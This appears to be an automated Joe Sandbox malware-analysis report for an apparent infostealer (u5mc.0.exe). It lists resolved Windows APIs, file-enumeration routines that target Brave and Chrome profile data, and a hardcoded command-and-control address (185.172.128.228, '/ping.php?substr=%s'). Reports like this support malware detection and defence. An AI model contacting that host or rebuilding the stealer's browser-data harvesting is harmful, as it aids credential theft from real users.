Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: T*@
API String ID: 4198646248-2370032326
Opcode ID: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
Opcode Fuzzy Hash: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05BF37D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05BF37DB

Strings

/ping.php?substr=%s, xrefs: 05BF37E3
185.172.128.228, xrefs: 05BF37E2

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: d4bfcc9bffd860d13ef917078e18baa43afd7a7a6be2846f2ec2f40478637d0d
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: E501CCB2A05115ABD708DF98EC44BAEB7B9FF44610F10056AFA05E3240D7B4AA44CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404373

Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47

__Getcoll.LIBCPMT ref: 004043CF

Strings

u@@, xrefs: 004043C9

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: H_prolog$Getcoll
String ID: u@@
API String ID: 206117190-736001340
Opcode ID: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
Opcode Fuzzy Hash: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6D4 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
GetLastError.KERNEL32 ref: 0041A778
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
Opcode Fuzzy Hash: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A

Uniqueness

Uniqueness Score: -1.00%

Function 05C0A93B Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 05C0A9D1
GetLastError.KERNEL32 ref: 05C0A9DF
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 05C0AA3A

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction ID: 8e2ac13d63ebe76476bc713b96a0a72583fe2a10e2e69aa4017c8157676e1ddd
Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction Fuzzy Hash: CD41E530704326AFCF21CF65DD48BBE7BA5AF41320F159969F95AAB1E0D7308A01CB64

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: u5mc.0.exePID: 7364, Parent PID: 7284COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	41

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,04263FD8), ref: 0041625D
GetProcAddress.KERNEL32(74DD0000,04264098), ref: 00416275
GetProcAddress.KERNEL32(74DD0000,04280750), ref: 0041628E
GetProcAddress.KERNEL32(74DD0000,04280720), ref: 004162A6
GetProcAddress.KERNEL32(74DD0000,04280738), ref: 004162BE
GetProcAddress.KERNEL32(74DD0000,04280768), ref: 004162D7
GetProcAddress.KERNEL32(74DD0000,0427FA20), ref: 004162EF
GetProcAddress.KERNEL32(74DD0000,04280780), ref: 00416307
GetProcAddress.KERNEL32(74DD0000,04286208), ref: 00416320
GetProcAddress.KERNEL32(74DD0000,042862F8), ref: 00416338
GetProcAddress.KERNEL32(74DD0000,04286400), ref: 00416350
GetProcAddress.KERNEL32(74DD0000,042641F8), ref: 00416369
GetProcAddress.KERNEL32(74DD0000,04264258), ref: 00416381
GetProcAddress.KERNEL32(74DD0000,042641B8), ref: 00416399
GetProcAddress.KERNEL32(74DD0000,04264178), ref: 004163B2
GetProcAddress.KERNEL32(74DD0000,042863E8), ref: 004163CA
GetProcAddress.KERNEL32(74DD0000,04286418), ref: 004163E2
GetProcAddress.KERNEL32(74DD0000,0427FB38), ref: 004163FB
GetProcAddress.KERNEL32(74DD0000,04264278), ref: 00416413
GetProcAddress.KERNEL32(74DD0000,04286478), ref: 0041642B
GetProcAddress.KERNEL32(74DD0000,04286340), ref: 00416444
GetProcAddress.KERNEL32(74DD0000,042864D8), ref: 0041645C
GetProcAddress.KERNEL32(74DD0000,04286490), ref: 00416474
GetProcAddress.KERNEL32(74DD0000,04264038), ref: 0041648D
GetProcAddress.KERNEL32(74DD0000,04286388), ref: 004164A5
GetProcAddress.KERNEL32(74DD0000,042863B8), ref: 004164BD
GetProcAddress.KERNEL32(74DD0000,042864A8), ref: 004164D6
GetProcAddress.KERNEL32(74DD0000,04286358), ref: 004164EE
GetProcAddress.KERNEL32(74DD0000,042864C0), ref: 00416506
GetProcAddress.KERNEL32(74DD0000,04286430), ref: 0041651F
GetProcAddress.KERNEL32(74DD0000,04286460), ref: 00416537
GetProcAddress.KERNEL32(74DD0000,042863A0), ref: 0041654F
GetProcAddress.KERNEL32(74DD0000,04286448), ref: 00416568
GetProcAddress.KERNEL32(74DD0000,04282298), ref: 00416580
GetProcAddress.KERNEL32(74DD0000,042864F0), ref: 00416598
GetProcAddress.KERNEL32(74DD0000,04286238), ref: 004165B1
GetProcAddress.KERNEL32(74DD0000,04263F58), ref: 004165C9
GetProcAddress.KERNEL32(74DD0000,04286220), ref: 004165E1
GetProcAddress.KERNEL32(74DD0000,042641D8), ref: 004165FA
GetProcAddress.KERNEL32(74DD0000,04286310), ref: 00416612
GetProcAddress.KERNEL32(74DD0000,04286250), ref: 0041662A
GetProcAddress.KERNEL32(74DD0000,042640B8), ref: 00416643
GetProcAddress.KERNEL32(74DD0000,04263E98), ref: 0041665B
LoadLibraryA.KERNEL32(04286268,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(04286280,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(04286298,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(042862B0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(042862C8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(042862E0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(04286328,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(04286370,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(75290000,04263EB8), ref: 0041670A
GetProcAddress.KERNEL32(75290000,042863D0), ref: 00416722
GetProcAddress.KERNEL32(75290000,042808C8), ref: 0041673A
GetProcAddress.KERNEL32(75290000,042865C8), ref: 00416753
GetProcAddress.KERNEL32(75290000,04264218), ref: 0041676B
GetProcAddress.KERNEL32(734C0000,0427F958), ref: 00416790
GetProcAddress.KERNEL32(734C0000,042640D8), ref: 004167A9
GetProcAddress.KERNEL32(734C0000,0427F9A8), ref: 004167C1
GetProcAddress.KERNEL32(734C0000,04286508), ref: 004167D9
GetProcAddress.KERNEL32(734C0000,04286568), ref: 004167F2
GetProcAddress.KERNEL32(734C0000,04264238), ref: 0041680A
GetProcAddress.KERNEL32(734C0000,04264158), ref: 00416822
GetProcAddress.KERNEL32(734C0000,04286520), ref: 0041683B
GetProcAddress.KERNEL32(752C0000,042640F8), ref: 0041685C
GetProcAddress.KERNEL32(752C0000,04263ED8), ref: 00416874
GetProcAddress.KERNEL32(752C0000,04286538), ref: 0041688D
GetProcAddress.KERNEL32(752C0000,04286550), ref: 004168A5
GetProcAddress.KERNEL32(752C0000,04263EF8), ref: 004168BD
GetProcAddress.KERNEL32(74EC0000,0427F7A0), ref: 004168E3
GetProcAddress.KERNEL32(74EC0000,0427FA70), ref: 004168FB
GetProcAddress.KERNEL32(74EC0000,04286580), ref: 00416913
GetProcAddress.KERNEL32(74EC0000,04263FF8), ref: 0041692C
GetProcAddress.KERNEL32(74EC0000,04264138), ref: 00416944
GetProcAddress.KERNEL32(74EC0000,0427FAC0), ref: 0041695C
GetProcAddress.KERNEL32(75BD0000,04286598), ref: 00416982
GetProcAddress.KERNEL32(75BD0000,04263F18), ref: 0041699A
GetProcAddress.KERNEL32(75BD0000,04280978), ref: 004169B2
GetProcAddress.KERNEL32(75BD0000,042865B0), ref: 004169CB
GetProcAddress.KERNEL32(75BD0000,042869D0), ref: 004169E3
GetProcAddress.KERNEL32(75BD0000,04263F38), ref: 004169FB
GetProcAddress.KERNEL32(75BD0000,04264018), ref: 00416A14
GetProcAddress.KERNEL32(75BD0000,04286940), ref: 00416A2C
GetProcAddress.KERNEL32(75BD0000,042869A0), ref: 00416A44
GetProcAddress.KERNEL32(75A70000,04263F78), ref: 00416A66
GetProcAddress.KERNEL32(75A70000,04286AA8), ref: 00416A7E
GetProcAddress.KERNEL32(75A70000,04286A00), ref: 00416A96
GetProcAddress.KERNEL32(75A70000,04286958), ref: 00416AAF
GetProcAddress.KERNEL32(75A70000,04286B98), ref: 00416AC7
GetProcAddress.KERNEL32(75450000,04264118), ref: 00416AE8
GetProcAddress.KERNEL32(75450000,04263F98), ref: 00416B01
GetProcAddress.KERNEL32(75DA0000,04263FB8), ref: 00416B22
GetProcAddress.KERNEL32(75DA0000,04286BB0), ref: 00416B3A
GetProcAddress.KERNEL32(6F090000,04264058), ref: 00416B60
GetProcAddress.KERNEL32(6F090000,04264078), ref: 00416B78
GetProcAddress.KERNEL32(6F090000,04287458), ref: 00416B90
GetProcAddress.KERNEL32(6F090000,04286BC8), ref: 00416BA9
GetProcAddress.KERNEL32(6F090000,042872B8), ref: 00416BC1
GetProcAddress.KERNEL32(6F090000,04287218), ref: 00416BD9
GetProcAddress.KERNEL32(6F090000,042874F8), ref: 00416BF2
GetProcAddress.KERNEL32(6F090000,04287518), ref: 00416C0A
GetProcAddress.KERNEL32(75AF0000,04286928), ref: 00416C2B
GetProcAddress.KERNEL32(75AF0000,04280848), ref: 00416C44
GetProcAddress.KERNEL32(75AF0000,04286BE0), ref: 00416C5C
GetProcAddress.KERNEL32(75AF0000,04286AD8), ref: 00416C74
GetProcAddress.KERNEL32(75D90000,04287338), ref: 00416C96
GetProcAddress.KERNEL32(6CA80000,04286970), ref: 00416CB7
GetProcAddress.KERNEL32(6CA80000,04287358), ref: 00416CCF
GetProcAddress.KERNEL32(6CA80000,04286AC0), ref: 00416CE8
GetProcAddress.KERNEL32(6CA80000,04286988), ref: 00416D00

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s\%s, xrefs: 004117FD
%s\%s, xrefs: 00411714
%s\%s\%s, xrefs: 004117DB
%s\*, xrefs: 0041165D
%s%s, xrefs: 00411838

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

\Brave\Preferences, xrefs: 0040B97B
Preferences, xrefs: 0040B8BE
Brave, xrefs: 0040B8A2
Google Chrome, xrefs: 0040BDB9

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: e5cae10d02fa7d777ce186465a0be00966abf08ed97bb0f5455a78fc69622242
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: e5cae10d02fa7d777ce186465a0be00966abf08ed97bb0f5455a78fc69622242
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 6BA135A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6BA9F688,00001000), ref: 6BA135D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BA135E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6BA135FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BA1363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BA1369F
__aulldiv.LIBCMT ref: 6BA136E4
QueryPerformanceCounter.KERNEL32(?), ref: 6BA13773
EnterCriticalSection.KERNEL32(6BA9F688), ref: 6BA1377E
LeaveCriticalSection.KERNEL32(6BA9F688), ref: 6BA137BD
QueryPerformanceCounter.KERNEL32(?), ref: 6BA137C4
EnterCriticalSection.KERNEL32(6BA9F688), ref: 6BA137CB
LeaveCriticalSection.KERNEL32(6BA9F688), ref: 6BA13801
__aulldiv.LIBCMT ref: 6BA13883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6BA13902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6BA13918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6BA1394C

Strings

GTC, xrefs: 6BA13912
GenuntelineI, xrefs: 6BA13639
AuthcAMDenti, xrefs: 6BA13946
MOZ_TIMESTAMP_MODE, xrefs: 6BA135DB
QPC, xrefs: 6BA138FC

Memory Dump Source

Source File: 00000001.00000002.2187714449.000000006BA11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BA10000, based on PE: true

Associated: 00000001.00000002.2187694084.000000006BA10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2187775846.000000006BA8D000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2187802470.000000006BA9E000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2187822727.000000006BAA2000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba10000_u5mc.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: d7364798058d8fc80750099a0602016f4b72d4649a1168adb150df2b088e8e80
Instruction ID: 2428dc945827031d9593111d1c4c55d8d5323727c677a57bf26ecc48cd95c4ed
Opcode Fuzzy Hash: d7364798058d8fc80750099a0602016f4b72d4649a1168adb150df2b088e8e80
Instruction Fuzzy Hash: B4B1A271A2C350AFDF08EF28C84461AB7E9BB8A700F04C52EE999D7350DB35E8479B51

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00412589
FindFirstFileA.KERNEL32(?,?), ref: 004125A0
StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

%s\%s, xrefs: 004125FE
%s\*, xrefs: 0041257D
%s\%s, xrefs: 0041264F

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 70f66335c68ee9bee9e93ad0ea58b8d0e5d9bc99c8bb7c2902da79831dca3d0c
Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
Opcode Fuzzy Hash: 70f66335c68ee9bee9e93ad0ea58b8d0e5d9bc99c8bb7c2902da79831dca3d0c
Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411B9D
FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
FindClose.KERNEL32(000000FF), ref: 00411D52

Strings

%s\%s, xrefs: 00411B91

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 8a2a5c367229f5874a14f57b428850a66a498e63ff653c6488f4aaaa7e785072
Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
Opcode Fuzzy Hash: 8a2a5c367229f5874a14f57b428850a66a498e63ff653c6488f4aaaa7e785072
Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: d5e21135cb13028b418015c916ecc19e9a267484bd34271ce1c6086416c75736
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: d5e21135cb13028b418015c916ecc19e9a267484bd34271ce1c6086416c75736
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

